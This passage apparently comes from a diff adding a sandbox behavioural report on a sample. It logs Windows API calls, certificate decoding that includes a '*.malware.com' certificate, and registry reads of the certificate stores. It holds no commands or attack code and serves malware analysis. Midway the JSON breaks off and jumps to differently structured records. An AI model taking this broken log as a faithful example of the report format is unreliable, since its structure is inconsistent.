{ + "name": "BaseAddress", + "value": "0x00581000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 3016 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701f645", + "parentcaller": "0x77034248", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05a91000" + }, + { + "name": "RegionSize", + "value": "0x0002d000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 3017 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701f645", + "parentcaller": "0x77034713", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05927000" + }, + { + "name": "RegionSize", + "value": "0x0001f000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 3018 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701fae4", + "parentcaller": "0x7701f7cb", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x058fa000" + }, + { + "name": "RegionSize", + "value": "0x0004c000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 3019 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701fae4", + "parentcaller": "0x7701f7cb", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05a91000" + }, + { + "name": "RegionSize", + "value": "0x0002d000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 3020 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701fae4", + "parentcaller": "0x7701f7cb", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00579000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 3021 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701f645", + "parentcaller": "0x77034713", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x058fa000" + }, + { + "name": "RegionSize", + "value": "0x0004c000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 3022 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x756b8be2", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 3023 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7680cb46", + "parentcaller": "0x7680c981", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "0\\x03\\x01\\x01\\xff" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 3024 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7680cb46", + "parentcaller": "0x7680ca1c", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "0\\x16\\x80\\x14\\x03\\x88\\x86\\x19\\xa6t\\xeb\\xbb\\x85\\xb0\\x1cQ\\x96$q;C\\x99\\x9a\\xe1" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 3025 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767fcffb", + "parentcaller": "0x767eb471", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x03\\x9b0\\x82\\x02\\x83\\xa0\\x03\\x02\\x01\\x02\\x02\\x14oO$OK\\xe4\\xebi\\x92\\x80\\x88\\xd4\\xa1\\xbb)\\x80\\xaf\\xf1\\xf5\\xcf0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000]1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x0c\nSome-State1!0\\x1f\\x06\\x03U\\x04\n\\x0c\\x18Internet Widgits Pty Ltd1\\x160\\x14\\x06\\x03U\\x04\\x03\\x0c\r*.malware.com0\\x1e\\x17\r200513125616Z\\x17\r300511125616Z0]1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x0c\nSome-State1!0\\x1f\\x06\\x03U\\x04\n\\x0c\\x18Internet Widgits Pty Ltd1\\x160\\x14\\x06\\x03U\\x04" + }, + { + "name": "Flags", + "value": "0x0000800d" + } + ], + "repeated": 0, + "id": 3026 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x76801e39", + "parentcaller": "0x76801dfb", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x01\n\\x02\\x82\\x01\\x01\\x00\\xc8^\\x18^\\xd4\\xe4\\\\xdc\\xe0fBtQ\\xb4\\x96\\x10\tS\\x8aW.L\\x95\\x95\\x90\\x1b,}\\x8d\\xfc\\xc3y\\xffi\\xb6\\x06\\x16\\x84\\xbb\\xaa5\\xcc\\xe4\\xe2\\xf7+\\xce\n\\xed\\xac?\\x9f\\xf3S\\x98\\xca\\x97\\xc5\\xfbr\\xee(\\x95\\xea\\x16Cz\\x07t\\xc7\\x06;\\xdb\\x0b\\xd3\\xb5\\xa4LM\\xcb\\x83q\\x13]H\\x93(\\xab6\\x94f\\xa9\\x0bm\\x05\\x97:E\\xa6\\x03\\xaaR\\xdb\\xbfs\\xfe\\x1cX\\xb5:UzH\\xfc\\xb1dx\\x08\\xa1\\xfcST\\xf8\\xba\\x81AcJ6l\\xc7k\\x1a\\xffX<\\x0e\\x90\\xde\\x9eM9>N\\xb6F\\xae\\xb3a+\\x1a\\xbe\\x84\\xff\\x98@\\xc78\\xd1H\\xa1\\xa1\\xc7\\xd5+\\xb0\\xe4\\xdb\\xafT\\x87;[\\x01\\x04\\xd4\\xe6\\xc6va\\x02#\\xbe(\\xf6Nr\\x87\\x04{\\xfa^OIq\\xda\\xa5\\x8bB\\xc0\\xe4\\xa9\\xf8\\x11Q\\xfb\\x01ufg\\xfc\\xbf9\\xeb(#t\\x90\\xa8KCe\\xd5\\x95\\xc3R\\x16\\x15\\x99\n\\x94\\x9d\\x8a\\x19\\xa1\\x88\\xca\t\\x9f\\x02b&[\\x16<\\xca\\xd0" + }, + { + "name": "Flags", + "value": "0x00008000" + } + ], + "repeated": 0, + "id": 3027 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x76801d87", + "parentcaller": "0x76812a6d", + "category": "crypto", + "api": "CryptImportKey", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "KeyBlob", + "value": "\\x06\\x02\\x00\\x00\\x00\\xa4\\x00\\x00RSA1\\x00\\x08\\x00\\x00\\x01\\x00\\x01\\x00\\x89-Z\\x82\\xacF\\xc9\\x88\\x82\\xd0\\xca<\\x16[&b\\x02\\x9f\t\\xca\\x88\\xa1\\x19\\x8a\\x9d\\x94\n\\x99\\x15\\x16R\\xc3\\x95\\xd5eCK\\xa8\\x90t#(\\xeb9\\xbf\\xfcgfu\\x01\\xfbQ\\x11\\xf8\\xa9\\xe4\\xc0B\\x8b\\xa5\\xdaqIO^\\xfa{\\x04\\x87rN\\xf6(\\xbe#\\x02av\\xc6\\xe6\\xd4\\x04\\x01[;\\x87T\\xaf\\xdb\\xe4\\xb0+\\xd5\\xc7\\xa1\\xa1H\\xd18\\xc7@\\x98\\xff\\x84\\xbe\\x1a+a\\xb3\\xaeF\\xb6N>9M\\x9e\\xde\\x90\\x0eN\\xb6F\\xae\\xb3a+\\x1a\\xbe\\x84\\xff\\x98@\\xc78\\xd1H\\xa1\\xa1\\xc7\\xd5+\\xb0\\xe4\\xdb\\xafT\\x87;[\\x01\\x04\\xd4\\xe6\\xc6va\\x02#\\xbe(\\xf6Nr\\x87\\x04{\\xfa^OIq\\xda\\xa5\\x8bB\\xc0\\xe4\\xa9\\xf8\\x11Q\\xfb\\x01ufg\\xfc\\xbf9\\xeb(#t\\x90\\xa8KCe\\xd5\\x95\\xc3R\\x16\\x15\\x99\n\\x94\\x9d\\x8a\\x19\\xa1\\x88\\xca\t\\x9f\\x02b&[\\x16<\\xca\\xd0\\x82\\x88\\xc9F\\xac\\x82Z-\\x89\\x02\\x03\\x01\\x00\\x01\\xa3S0Q0\\x1d\\x06\\x03U\\x1d\\x0e\\x04\\x16\\x04\\x14\\x03\\x88\\x86\\x19\\xa6t\\xeb\\xbb\\x85\\xb0\\x1cQ\\x96$q;C\\x99\\x9a\\xe10\\x1f\\x06\\x03U\\x1d#\\x04\\x180\\x16\\x80\\x14\\x03\\x88\\x86\\x19\\xa6t\\xeb\\xbb\\x85\\xb0\\x1cQ\\x96$q;C\\x99\\x9a\\xe10\\x0f\\x06\\x03U\\x1d\\x13\\x01\\x01\\xff\\x04\\x050\\x03\\x01\\x01\\xff" + }, + { + "name": "Length", + "value": "647" + } + ], + "repeated": 0, + "id": 3030 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7701f645", + "parentcaller": "0x77037a44", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05856000" + }, + { + "name": "RegionSize", + "value": "0x00011000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 3031 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 3032 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + } + ], + "repeated": 0, + "id": 3033 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 3034 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\AuthRoot" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\AuthRoot" + } + ], + "repeated": 0, + "id": 3035 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x76801e39", + "parentcaller": "0x76801dfb", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x01\n\\x02\\x82\\x01\\x01\\x00\\xc8^\\x18^\\xd4\\xe4\\\\xdc\\xe0fBtQ\\xb4\\x96\\x10\tS\\x8aW.L\\x95\\x95\\x90\\x1b,}\\x8d\\xfc\\xc3y\\xffi\\xb6\\x06\\x16\\x84\\xbb\\xaa5\\xcc\\xe4\\xe2\\xf7+\\xce\n\\xed\\xac?\\x9f\\xf3S\\x98\\xca\\x97\\xc5\\xfbr\\xee(\\x95\\xea\\x16Cz\\x07t\\xc7\\x06;\\xdb\\x0b\\xd3\\xb5\\xa4LM\\xcb\\x83q\\x13]H\\x93(\\xab6\\x94f\\xa9\\x0bm\\x05\\x97:E\\xa6\\x03\\xaaR\\xdb\\xbfs\\xfe\\x1cX\\xb5:UzH\\xfc\\xb1dx\\x08\\xa1\\xfcST\\xf8\\xba\\x81AcJ6l\\xc7k\\x1a\\xffX<\\x0e\\x90\\xde\\x9eM9>N\\xb6F\\xae\\xb3a+\\x1a\\xbe\\x84\\xff\\x98@\\xc78\\xd1H\\xa1\\xa1\\xc7\\xd5+\\xb0\\xe4\\xdb\\xafT\\x87;[\\x01\\x04\\xd4\\xe6\\xc6va\\x02#\\xbe(\\xf6Nr\\x87\\x04{\\xfa^OIq\\xda\\xa5\\x8bB\\xc0\\xe4\\xa9\\xf8\\x11Q\\xfb\\x01ufg\\xfc\\xbf9\\xeb(#t\\x90\\xa8KCe\\xd5\\x95\\xc3R\\x16\\x15\\x99\n\\x94\\x9d\\x8a\\x19\\xa1\\x88\\xca\t\\x9f\\x02b&[\\x16<\\xca\\xd0" + }, + { + "name": "Flags", + "value": "0x00008000" + } + ], + "repeated": 0, + "id": 3036 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x76801d87", + "parentcaller": "0x76801cb7", + "category": "crypto", + "api": "CryptImportKey", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "KeyBlob", + "value": "\\x06\\x02\\x00\\x00\\x00\\xa4\\x00\\x00RSA1\\x00\\x08\\x00\\x00\\x01\\x00\\x01\\x00\\x89-Z\\x82\\xacF\\xc9\\x88\\x82\\xd0\\xca<\\x16[&b\\x02\\x9f\t\\xca\\x88\\xa1\\x19\\x8a\\x9d\\x94\n\\x99\\x15\\x16R\\xc3\\x95\\xd5eCK\\xa8\\x90t#(\\xeb9\\xbf\\xfcgfu\\x01\\xfbQ\\x11\\xf8\\xa9\\xe4\\xc0B\\x8b\\xa5\\xdaqIO^\\xfa{\\x04\\x87rN\\xf6(\\xbe#\\x02av\\xc6\\xe6\\xd4\\x04\\x01[;\\x87T\\xaf\\xdb\\xe4\\xb0+\\xd5\\xc7\\xa1\\xa1H\\xd18\\xc7@\\x98\\xff\\x84\\xbe\\x1a+a\\xb3\\xaeF\\xb6N>9M\\x9e\\xde\\x90\\x0e\\x80\\x10\\x12\\xe4\t-\\x06\\x1d\\x1dO\\x00\\x8da!\\xdc\\x16dc\\xa1\\x180\\x161\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bRoot Agency\\x82\\x10\\x067l\\x00\\xaa\\x00d\\x8a\\x11\\xcf\\xb8\\xd4\\xaa\\5\\xf40\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x00\\x03A\\x00-.>{\\x89B\\x89?\\xa8!" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 250, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\CRLs\\A377D1B1C0538833035211F4083D00FECC414DAB\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 251, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\CRLs\\A377D1B1C0538833035211F4083D00FECC414DAB\\Blob", + "content": "\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xa3w\\xd1\\xb1\\xc0S\\x883\\x03R\\x11\\xf4\\x08=\\x00\\xfe\\xccAM\\xab!\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb5\\x01\\x00\\x000\\x82\\x01\\xb10\\x82\\x01\\x1a\\x02\\x01\\x010\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x000a1\\x110\\x0f\\x06\\x03U\\x04\\x07\\x13\\x08Internet1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1301\\x06\\x03U\\x04\\x0b\\x13*VeriSign Commercial Software Publishers CA\\x17\r010324000000Z\\x17\r040107235959Z0i0!\\x02\\x10\\x1bQ\\x90\\xf77$9\\x9c\\x92T\\xcdBF7\\x99j\\x17\r010130000124Z0!\\x02\\x10u\\x0e@\\xff\\x97\\xf0G\\xed\\xf5V\\xc7\\x08N\\xb1\\xab\\xfd\\x17\r010131000049Z0!\\x02\\x10w\\xe6ZCY\\x93]_zu\\x80\\x1a\\xcd\\xad\\xc2\"\\x17\r000831000056Z\\xa0\\x1a0\\x180\t\\x06\\x03U\\x1d\\x13\\x04\\x020\\x000\\x0b\\x06\\x03U\\x1d\\x0f\\x04\\x04\\x03\\x02\\x05\\xa00\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x00\\x03\\x81\\x81\\x00\\x18,\\xe8\\xfc\\x16m\\x91J=\\x88TH]\\xb8\\x11\\xbfd\\xbb\\xf9\\xdaY\\x19\\xdd\\x0ee\\xab\\xc0\\x0c\\xfag~!\\x1e\\x83\\x0e\\xcf\\x9b\\x89\\x8a\\xcf\\x0cK\\xc19\\x9d\\xe7j\\xacFtj\\x91b\"\r\\xc4\\x08\\xbd\\xf5\n\\x90\\x7f\\x06!=~\\xa7\\xaa^\\xcd\"\\x15\\xe6\\x0cu\\x8en\\xad\\xf1\\x84\\xe4\"\\xb40o\\xfbd\\x8f\\xd7\\x80C\\xf5\\x19\\x18f\\x1dr\\xa3\\xe3\\x94\\x82(R\\xa0\\x06N\\xb1\\xc8\\x92\\x0c\\x97\\xbe\\x15\\x07\\xabz\\xc9\\xea\\x08gCMQc;\\x9c\\x9c\\xcd" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 252, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs\\27748148BBE67A43CDBFEC6C3784862CE134E6EA\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 253, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs\\27748148BBE67A43CDBFEC6C3784862CE134E6EA\\Blob", + "content": "\\x03\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x14\\x00\\x00\\x00't\\x81H\\xbb\\xe6zC\\xcd\\xbf\\xecl7\\x84\\x86,\\xe14\\xe6\\xea\"\\x00\\x00\\x00\\x01\\x00\\x01\\x00*\\x02\\x00\\x000\\x82\\x02&\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x07\\x02\\xa0\\x82\\x02\\x170\\x82\\x02\\x13\\x02\\x01\\x011\\x000\\x82\\x02\\x08\\x06\t+\\x06\\x01\\x04\\x01\\x827\n\\x01\\xa0\\x82\\x01\\xf90\\x82\\x01\\xf50\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x1e\\x04(D\\x00i\\x00s\\x00a\\x00l\\x00l\\x00o\\x00w\\x00e\\x00d\\x00C\\x00e\\x00r\\x00t\\x00_\\x00O\\x00S\\x00_\\x001\\x00\\x00\\x00\\x02\\x08\\x01\\xcd??\\xac\\xc3\\xee\\x89\\x17\r120531151137Z0\\x0e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x0f\\x05\\x000\\x82\\x01\\x900\\x12\\x04\\x10%\\xfbz]\\x86\\xf7/^g(\\x8fys\\x05\\xfe\\x940\\x12\\x04\\x10o-Ce\\xc1\\x02\\x1f[\\x8bc\\xef\\x13+\\xc3\\xb3`0\\x12\\x04\\x10\\xad\\x11\\xdb\\xb7l\\x9c\\xf1\\xab\\x99\\x98\\xcd\\x84.\\xc1vs0\\x12\\x04\\x10\\xdf\\xbd\\xd7/\\x99\\xc3\\xb6Jy~Z\\xc9mY\\xbeV0\\x12\\x04\\x10\\xc6h\\x15K\\xe9^\\x16\\xad\\xbc2\\x1a\\xbc1n8J0\\x12\\x04\\x1079.\\x83=\\xc6\\x05\\xdd{8$G9\\x93\\x9e\\xe30\\x12\\x04\\x101y\\xfeKW&\\xd8\\xdb*\\xaf=\\xf9X\\xc9k\\x970\\x12\\x04\\x10\\xc3Z\\x97\\xc8\\x0fh}\\xc3\\xc1\\x08\\xc6\\xa33\\x9bhF0\\x12\\x04\\x10!\\x18\\xa4\\xc6\\xf7\\x18\\xcf\\xc7\\xd6\\xd8x\\x8cSt\\xd3)0\\x12\\x04\\x10Rj9\\xc0M\\x15\\x86-B\\x7f\\xd9%\\xaf\\x036\\x900\\x12\\x04\\x10<6\\xe1h\\xab\\xcc\\x85\\x96c\\xedG\\xa0\\xc0Z\\xeey0\\x12\\x04\\x10\\x01\\x9e}V\\xd6\r\\xb9\\xad\\xec@\\xb9g\\xb1\\xbc\\xba\\x9f0\\x12\\x04\\x106\\xcd\\xe9\\x9a\\xb8s\\x7f\\x86(|X7\\x04\\xc9^\\x160\\x12\\x04\\x10&\\x99\nwX~\\xd8d\\x01\\x84\\xc4\\x93f\\xac\\xb0u0\\x12\\x04\\x10\\xf6\\x9d\"\\xae\\x1e\\xd6\\x15\\xb1\\xb9\\xe3\\x90\\xe3\\x10\\xbb\\xbb10\\x12\\x04\\x10\\xeb\\xe9\n\\xd1\\x01\\xd3\\x80+\\x8aL\\x91<" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 254, + "data": { + "file": "C:\\Windows\\System32\\rsaenh.dll", + "pathtofile": null, + "moduleaddress": "0x73aa0000" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 255, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots\\Certificates", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 256, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots\\Certificates", + "content": "\\x18\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xd0U\\xcb\\xf4\\x0e~\\xdb\\x01\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 257, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\0119E81BE9A14CD8E22F40AC118C687ECBA3F4D8\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 258, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\0119E81BE9A14CD8E22F40AC118C687ECBA3F4D8\\Blob", + "content": "\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x10\\x00\\x00|\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xfc\\x02\\xa4\\x9e.\\x1e\\x8eH\\x8c\\xa2\\x91!5W,\\xc2\\xf8\\xe7\\x1b\\xb0\\xe2\\xf2\\x85\\x96\\xb3r\"\\x99\\xf5\\xcb\\x9cb\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x84's\\x95\\x00\\x86\\xd0k\\x04\\xd7\\x02-b\\xa2\\x84\\xbek\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00e\\xaf\\x95\\xf4\\xbe\\x86\\x84sDcB\\x82\\xf9A\\xb2\\xe6\\x05\\x06>\\xf0\\xc8T/\\x01L\\xa0\\x88\\xd1\\x82\\x10\\x9eO\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00j\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00T\\x00i\\x00m\\x00e\\x00 \\x00S\\x00t\\x00a\\x00m\\x00p\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00 \\x002\\x000\\x001\\x004\\x00\\x00\\x00i\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x02\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x19\\xe8\\x1b\\xe9\\xa1L\\xd8\\xe2/@\\xac\\x11\\x8ch~\\xcb\\xa3\\xf4\\xd8\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x004\\xf7&\\x98\\xd7\\x0e#\\x1f\\x8d\\xc4[W\\xf1\\x18\\xa4K\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xe4\\xa2\\xf6\\xfe\\x9c\\xa7\\xf1\\x8a+\\xeb\\xa9aa0\\x8b\\xaa\\x88\\x80\\xb0\\x13\\x16\\x1d\\xdd\\x852\\xd4%\\x9e'\\xe5\\x05p\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xcb\\xd1\\xf2\\xceH\\xfd\\x01\\x9f\\xeaV\\xaaW\\xd1~\\x99X\\xf8?\\xff\\xe0Y\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x16\\x00\\x00\\x00R\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x002\\x005\\x006\\x00\\x00\\x00 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x06\\x00\\x000\\x82\\x06\\x030\\x82\\x03\\xeb\\xa0\\x03\\x02\\x01\\x02\\x02\\x10/\\xd6zC\"\\x932\\x90E\\xe9S4>\\xe2tf0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000\\x81\\x931\\x0b0\t\\x06" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 259, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\06F1AA330B927B753A40E68CDF22E34BCBEF3352\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 260, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\06F1AA330B927B753A40E68CDF22E34BCBEF3352\\Blob", + "content": 